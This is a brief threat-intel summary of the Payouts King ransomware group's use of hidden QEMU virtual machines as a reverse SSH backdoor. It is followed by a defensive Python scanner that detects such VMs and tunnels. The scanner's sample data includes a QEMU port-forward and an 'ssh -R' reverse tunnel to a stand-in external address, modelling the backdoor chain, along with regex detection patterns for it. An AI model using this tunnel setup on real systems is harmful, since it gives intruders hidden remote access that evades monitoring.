Payouts King ransomware uses QEMU VMs to bypass endpoint security

Summary

The Payouts King ransomware group is employing a novel technique by using QEMU virtual machines as a reverse SSH backdoor. This allows them to operate hidden VMs on compromised systems, effectively evading detection by endpoint security solutions.

IFF Assessment

FOE

This represents a concerning development for defenders as it introduces a new evasion tactic that bypasses traditional endpoint security measures.

Defender Context

Defenders should be aware of this evolving ransomware tactic that leverages virtualization for stealth. This highlights the need for advanced threat hunting capabilities and potentially deeper inspection of system processes to detect unusual VM activity or unauthorized SSH tunnels.
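As an added illustration of the kind of hunting the note above calls for (example code written for this page, not from the original report or the group's tooling): a small scanner over a ps-style process listing that flags QEMU guests running from an unexpected path or exposing a guest port via `hostfwd`, flags SSH reverse tunnels (`-R`), and correlates the two into the VM-plus-reverse-SSH chain. The allow-listed install directories, the sample listing and the specific command-line shapes are assumptions, since the report does not give the actor's exact invocation.

```python
import re
from dataclasses import dataclass

# Constructed ps-style listing (pid, user, command); sample data, not from the report.
SAMPLE_PS = """\
1201 root /usr/bin/qemu-system-x86_64 -enable-kvm -m 2048 -drive file=/srv/vm/build.qcow2 -display none
2330 svc_backup C:\\Users\\Public\\qemu\\qemu-system-x86_64.exe -m 512 -netdev user,id=n0,hostfwd=tcp::2222-:22 -device e1000,netdev=n0 -nographic
2331 svc_backup ssh -N -R 0.0.0.0:4444:127.0.0.1:2222 ops@203.0.113.10
2400 alice ssh -L 8080:localhost:80 alice@intranet.example
2500 root /usr/sbin/sshd -D
"""

# Where an approved hypervisor install normally lives (assumed allow-list for this example).
EXPECTED_QEMU_DIRS = ("/usr/bin/", "/usr/libexec/", "C:\\Program Files\\")
HOSTFWD_RE = re.compile(r"hostfwd=tcp:[^:,]*:(\d+)-")          # host port of a user-mode forward
SSH_REVERSE_RE = re.compile(r"-R\s+(?:\S*?:)?(\d+):([^:\s]+):(\d+)")  # -R [bind:]port:host:hostport

@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str

def scan_process_listing(text: str) -> list[Finding]:
    """Flag QEMU guests and SSH reverse tunnels, then correlate the two."""
    rows = []
    for line in text.splitlines():
        pid, _user, cmd = line.split(maxsplit=2)
        rows.append((int(pid), cmd.split()[0], cmd))
    findings, fwd_ports = [], {}  # fwd_ports: host port -> qemu pid exposing it
    for pid, exe, cmd in rows:
        if re.search(r"qemu-system-\w+(\.exe)?$", exe):
            # A hypervisor launched outside its normal install path is suspicious on its own.
            if not exe.startswith(EXPECTED_QEMU_DIRS):
                findings.append(Finding(pid, "qemu_unexpected_path"))
            # hostfwd exposes a guest port (e.g. SSH) on the host, where a tunnel can reach it.
            for port in HOSTFWD_RE.findall(cmd):
                fwd_ports[int(port)] = pid
                findings.append(Finding(pid, "qemu_hostfwd"))
    for pid, exe, cmd in rows:
        m = SSH_REVERSE_RE.search(cmd) if exe.endswith("ssh") else None
        if m:
            findings.append(Finding(pid, "ssh_reverse_tunnel"))
            # Reverse tunnel aimed at a QEMU-forwarded local port: the hidden-VM backdoor chain.
            if m.group(2) in ("127.0.0.1", "localhost") and int(m.group(3)) in fwd_ports:
                findings.append(Finding(pid, "qemu_reverse_ssh_chain"))
    return findings

if __name__ == "__main__":
    for f in scan_process_listing(SAMPLE_PS):
        print(f"pid={f.pid} rule={f.rule}")
```

Feed it `ps -eo pid,user,args --no-headers` output (or the equivalent from an EDR process export); the ordinary forward tunnel and the system-path QEMU in the sample produce no findings, which is the intended baseline.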